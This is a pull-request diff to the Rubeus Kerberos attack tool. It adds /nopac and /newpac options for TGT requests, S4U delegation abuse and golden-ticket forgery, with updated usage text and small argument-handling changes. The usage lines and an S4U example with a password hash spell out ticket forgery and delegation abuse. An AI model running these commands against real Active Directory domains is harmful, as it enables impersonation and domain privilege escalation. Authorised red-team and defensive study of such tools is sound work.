### PR TITLE
added support for the new info_pac_buffers and the ability to request…

### DIFF
--- a/README.md
+++ b/README.md
@@ -79,19 +79,19 @@ Rubeus is licensed under the BSD 3-Clause license.
       | |  \ \| |_| | |_) ) ____| |_| |___ |
       |_|   |_|____/|____/|_____)____/(___/
 
-      v2.0.0
+      v2.0.1
 
 
      Ticket requests and renewals:
 
         Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID:
-            Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec]
+            Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac]
 
         Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID:
-            Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec]
+            Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac]
     
         Retrieve a TGT based on a user password/hash, start a /netonly process, and to apply the ticket to the new process/logon session:
-            Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec]
+            Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac]
 
         Retrieve a TGT using a PCKS12 certificate, start a /netonly process, and to apply the ticket to the new process/logon session:
             Rubeus.exe asktgt /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap]
@@ -116,10 +116,10 @@ Rubeus is licensed under the BSD 3-Clause license.
 
         Perform S4U constrained delegation abuse:
             Rubeus.exe s4u </ticket:BASE64 | /ticket:FILE.KIRBI> </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self]
-            Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/bronzebit]
+            Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/bronzebit] [/nopac]
 
         Perform S4U constrained delegation abuse across domains:
-            Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER /targetdomain:DOMAIN.LOCAL /targetdc:DC.DOMAIN.LOCAL [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/self]
+            Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER /targetdomain:DOMAIN.LOCAL /targetdc:DC.DOMAIN.LOCAL [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/self] [/nopac]
 
 
      Ticket Forgery:
@@ -128,10 +128,10 @@ Rubeus is licensed under the BSD 3-Clause license.
             Rubeus.exe golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> /ldap [/printcmd] [outfile:FILENAME] [/ptt]
 
         Forge a golden ticket using LDAP to gather the relevent information but explicitly overriding some values:
-            Rubeus.exe golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> /ldap [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/netbios:NETBIOS_DOMAIN] [/sid:DOMAIN_SID] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/printcmd] [outfile:FILENAME] [/ptt]
+            Rubeus.exe golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> /ldap [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/netbios:NETBIOS_DOMAIN] [/sid:DOMAIN_SID] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/newpac] [/printcmd] [outfile:FILENAME] [/ptt]
 
         Forge a golden ticket, setting values explicitly:
-            Rubeus.exe golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/printcmd] [outfile:FILENAME] [/ptt]
+            Rubeus.exe golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/newpac] [/printcmd] [outfile:FILENAME] [/ptt]
 
         Forge a silver ticket using LDAP to gather the relevent information:
             Rubeus.exe silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap [/printcmd] [outfile:FILENAME] [/ptt]
@@ -348,6 +348,8 @@ Note that no elevated privileges are needed on the host to request TGTs or apply
 By default, several differences exists between AS-REQ's generated by Rubeus and genuine AS-REQ's. To form AS-REQ's more inline with genuine requests, the `/opsec` flag can be used, this will send an initial AS-REQ without pre-authentication first, if this succeeds, the resulting AS-REP is decrypted and TGT return, otherwise an AS-REQ with pre-authentication is then sent. As this flag is intended to make Rubeus traffic more stealthy, it cannot by default be used with any encryption type other than `aes256` and will just throw a warning and exit if another encryption type is used. To allow for other encryption types to be used with the `/opsec` changes, the `/force` flag exists.
 
 PKINIT authentication is supported with the `/certificate:X` argument. When the private key within the PFX file is password protected, this password can be passed with the `/password:X` argument. When using PKINIT authentication the `/getcredentials` flag can be used to automatically request a U2U service ticket and retrieve the account NT hash.
+
+Requesting a TGT without a PAC can be done using the `/nopac` switch.
 
 Requesting a ticket via RC4 hash for **dfm.a@testlab.local**, applying it to the current logon session:
 
@@ -1009,6 +1011,8 @@ A **TL;DR** explanation is that an account with constrained delegation enabled i
 
 This "control" can be the hash of the account (`/rc4` or `/aes256`), or an existing TGT (`/ticket:X`) for the account with a **msds-allowedtodelegateto** value set. If a `/user` and rc4/aes256 hash is supplied, the **s4u** module performs an [asktgt](#asktgt) action first, using the returned ticket for the steps following. If a TGT `/ticket:X` is supplied, that TGT is used instead.
 
+If an account hash is supplied, the `/nopac` switch can be used to request the initial TGT without a PAC.
+
 A `/impersonateuser:X` parameter **MUST** be supplied to the **s4u** module. If nothing else is supplied, just the S4U2self process is executed, returning a forwardable ticket:
 
     C:\Rubeus>Rubeus.exe s4u /user:patsy /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:dfm.a
@@ -1279,6 +1283,8 @@ The `/printcmd` flag can be used to print the arguments required to generate ano
 ### golden
 
 The **golden** action will forge a TGT for the user `/user:X` encrypting the ticket with the hash passed with `/des:X`, `/rc4:X`, `/aes128:X` or `/aes256:X` and using the same key to create the ServerChecksum and KDCChecksum. The various arguments to set fields manually are described above or the `/ldap` flag can be used to automatically retrieve the information from the domain controller.
+
+The `/newpac` switch can be used to include the new *Requestor* and *Attributes* PAC_INFO_BUFFERs, added in response to CVE-2021-42287.
 
 Forging a TGT using the `/ldap` flag to retrieve the information and the `/printcmd` flag to print a command to forge another ticket with the same PAC information:
 

--- a/Rubeus/Commands/Asktgs.cs
+++ b/Rubeus/Commands/Asktgs.cs
@@ -85,7 +85,7 @@ namespace Rubeus.Commands
             {
                 u2u = true;
             }
-
+            
             if (arguments.ContainsKey("/service"))
             {
                 service = arguments["/service"];

--- a/Rubeus/Commands/Asktgt.cs
+++ b/Rubeus/Commands/Asktgt.cs
@@ -28,6 +28,7 @@ namespace Rubeus.Commands
             bool force = false;
             bool verifyCerts = false;
             bool getCredentials = false;
+            bool pac = true;
             LUID luid = new LUID();
             Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
 
@@ -145,6 +146,11 @@ namespace Rubeus.Commands
                 }
             }
 
+            if (arguments.ContainsKey("/nopac"))
+            {
+                pac = false;
+            }
+
             if (arguments.ContainsKey("/luid"))
             {
                 try
@@ -207,7 +213,7 @@ namespace Rubeus.Commands
                     return;
                 }
                 if (String.IsNullOrEmpty(certificate))
-                    Ask.TGT(user, domain, hash, encType, outfile, ptt, dc, luid, true, opsec, servicekey, changepw);
+                    Ask.TGT(user, domain, hash, encType, outfile, ptt, dc, luid, true, opsec, servicekey, changepw, pac);
                 else
                     Ask.TGT(user, domain, certificate, password, encType, outfile, ptt, dc, luid, true, verifyCerts, servicekey, getCredentials);
 

--- a/Rubeus/Commands/Golden.cs
+++ b/Rubeus/Commands/Golden.cs
@@ -54,6 +54,7 @@ namespace Rubeus.Commands
             string rangeInterval = "1d";
             string endTime = "";
             string renewTill = "";
+            bool newPac = false;
 
             string outfile = "";
             bool ptt = false;
@@ -343,6 +344,11 @@ namespace Rubeus.Commands
                 renewTill = arguments["/renewtill"];
             }
 
+            if (arguments.ContainsKey("/newpac"))
+            {
+                newPac = true;
+            }
+
             // actions for the ticket(s)
             if (arguments.ContainsKey("/ptt"))
             {
@@ -419,6 +425,7 @@ namespace Rubeus.Commands
                     resourceGroupSid,
                     resourceGroups,
                     uac,
+                    newPac,
                     outfile,
                     ptt,
                     printcmd

--- a/Rubeus/Commands/S4u.cs
+++ b/Rubeus/Commands/S4u.cs
@@ -27,6 +27,7 @@ namespace Rubeus.Commands
             bool self = false;
             bool opsec = false;
             bool bronzebit = false;
+            bool pac = true;
             Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial; // throwaway placeholder, changed to something valid
             KRB_CRED tgs = null;
 
@@ -115,6 +116,10 @@ namespace Rubeus.Commands
             {
                 bronzebit = true;
             }
+            if (arguments.ContainsKey("/nopac"))
+            {
+                pac = false;
+            }
 
             if (arguments.ContainsKey("/tgs"))
             {
@@ -189,7 +194,7 @@ namespace Rubeus.Commands
                     return;
                 }
 
-                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit);
+                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, pac);
                 return;
             }
             else

--- a/Rubeus/Commands/Silver.cs
+++ b/Rubeus/Commands/Silver.cs
@@ -498,6 +498,7 @@ namespace Rubeus.Commands
                     resourceGroupSid,
                     resourceGroups,
                     uac,
+                    false,
                     outfile,
                     ptt,
                     printcmd,

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -12,7 +12,7 @@ namespace Rubeus.Domain
             Console.WriteLine("  |  __  /| | | |  _ \\| ___ | | | |/___)");
             Console.WriteLine("  | |  \\ \\| |_| | |_) ) ____| |_| |___ |");
             Console.WriteLine("  |_|   |_|____/|____/|_____)____/(___/\r\n");
-            Console.WriteLine("  v2.0.0 \r\n");
+            Console.WriteLine("  v2.0.1 \r\n");
         }
 
         public static void ShowUsage()
@@ -21,13 +21,13 @@ namespace Rubeus.Domain
  Ticket requests and renewals:
 
     Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID:
-        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec]
+        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac]
 
     Retrieve a TGT based on a user password/hash, start a /netonly process, and to apply the ticket to the new process/logon session:
-        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec]
+        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac]
 
     Retrieve a TGT using a PCKS12 certificate, start a /netonly process, and to apply the ticket to the new process/logon session:
-        Rubeus.exe asktgt /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap]
+        Rubeus.exe asktgt /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/nopac]
 
     Retrieve a TGT using a certificate from the users keystore (Smartcard) specifying certificate thumbprint or subject, start a /netonly process, and to apply the ticket to the new process/logon session:
         Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap]
@@ -46,10 +46,10 @@ namespace Rubeus.Domain
 
     Perform S4U constrained delegation abuse:
         Rubeus.exe s4u </ticket:BASE64 | /ticket:FILE.KIRBI> </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self]
-        Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/bronzebit]
+        Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/bronzebit] [/nopac]
 
     Perform S4U constrained delegation abuse across domains:
-        Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER /targetdomain:DOMAIN.LOCAL /targetdc:DC.DOMAIN.LOCAL [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/self]
+        Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER /targetdomain:DOMAIN.LOCAL /targetdc:DC.DOMAIN.LOCAL [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/self] [/nopac]
 
 
  Ticket Forgery:
@@ -58,10 +58,10 @@ namespace Rubeus.Domain
         Rubeus.exe golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> /ldap [/printcmd] [outfile:FILENAME] [/ptt]
 
     Forge a golden ticket using LDAP to gather the relevent information but explicitly overriding some values:
-        Rubeus.exe golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> /ldap [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/netbios:NETBIOS_DOMAIN] [/sid:DOMAIN_SID] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/printcmd] [outfile:FILENAME] [/ptt]
+        Rubeus.exe golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> /ldap [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/netbios:NETBIOS_DOMAIN] [/sid:DOMAIN_SID] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/newpac] [/printcmd] [outfile:FILENAME] [/ptt]
 
     Forge a golden ticket, setting values explicitly:
-        Rubeus.exe golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/printcmd] [outfile:FILENAME] [/ptt]
+        Rubeus.exe golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/newpac] [/printcmd] [outfile:FILENAME] [/ptt]
 
     Forge a silver ticket using LDAP to gather the relevent information:
         Rubeus.exe silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap [/printcmd] [outfile:FILENAME] [/ptt]

--- a/Rubeus/Rubeus.csproj
+++ b/Rubeus/Rubeus.csproj
@@ -151,6 +151,8 @@
     <Compile Include="lib\krb_structures\KRB_ERROR.cs" />
     <Compile Include="lib\krb_structures\KRB_PRIV.cs" />
     <Compile Include="lib\krb_structures\LastReq.cs" />
+    <Compile Include="lib\krb_structures\pac\Attributes.cs" />
+    <Compile Include="lib\krb_structures\pac\Requestor.cs" />
     <Compile Include="lib\krb_structures\pac\S4UDelegationInfo.cs" />
     <Compile Include="lib\krb_structures\pac\PacCredentialInfo.cs" />
     <Compile Include="lib\krb_structures\pac\PACTYPE.cs" />

--- a/Rubeus/lib/Ask.cs
+++ b/Rubeus/lib/Ask.cs
@@ -32,7 +32,7 @@ namespace Rubeus {
 
     public class Ask
     {
-        public static byte[] TGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false, bool opsec = false, string servicekey="", bool changepw = false)
+        public static byte[] TGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false, bool opsec = false, string servicekey = "", bool changepw = false, bool pac = true)
         {
             // send request without Pre-Auth to emulate genuine traffic
             bool preauth = false;
@@ -48,7 +48,7 @@ namespace Rubeus {
                 {
                     Console.WriteLine("[*] Using {0} hash: {1}", etype, keyString);               
                     Console.WriteLine("[*] Building AS-REQ (w/ preauth) for: '{0}\\{1}'", domain, userName);
-                    AS_REQ userHashASREQ = AS_REQ.NewASReq(userName, domain, keyString, etype, opsec, changepw);
+                    AS_REQ userHashASREQ = AS_REQ.NewASReq(userName, domain, keyString, etype, opsec, changepw, pac);
                     return InnerTGT(userHashASREQ, etype, outfile, ptt, domainController, luid, describe, true, opsec, servicekey);
                 }
             }

--- a/Rubeus/lib/Interop.cs
+++ b/Rubeus/lib/Interop.cs
@@ -44,6 +44,7 @@ namespace Rubeus
             pre_authent = 0x00200000,
             hw_authent = 0x00100000,
             ok_as_delegate = 0x00040000,
+            anonymous = 0x00020000,
             name_canonicalize = 0x00010000,
             //cname_in_pa_data = 0x00040000,
             enc_pa_rep = 0x00010000,
@@ -68,6 +69,7 @@ namespace Rubeus
             CANONICALIZE = 0x00010000,
             CNAMEINADDLTKT = 0x00004000,
             OK_AS_DELEGATE = 0x00040000,
+            REQUEST_ANONYMOUS = 0x00008000,
             UNUSED12 = 0x00080000,
             OPTHARDWAREAUTH = 0x00100000,
             PREAUTHENT = 0x00200000,
@@ -724,6 +726,7 @@ namespace Rubeus
             DONT_REQ_PREAUTH = 4194304,
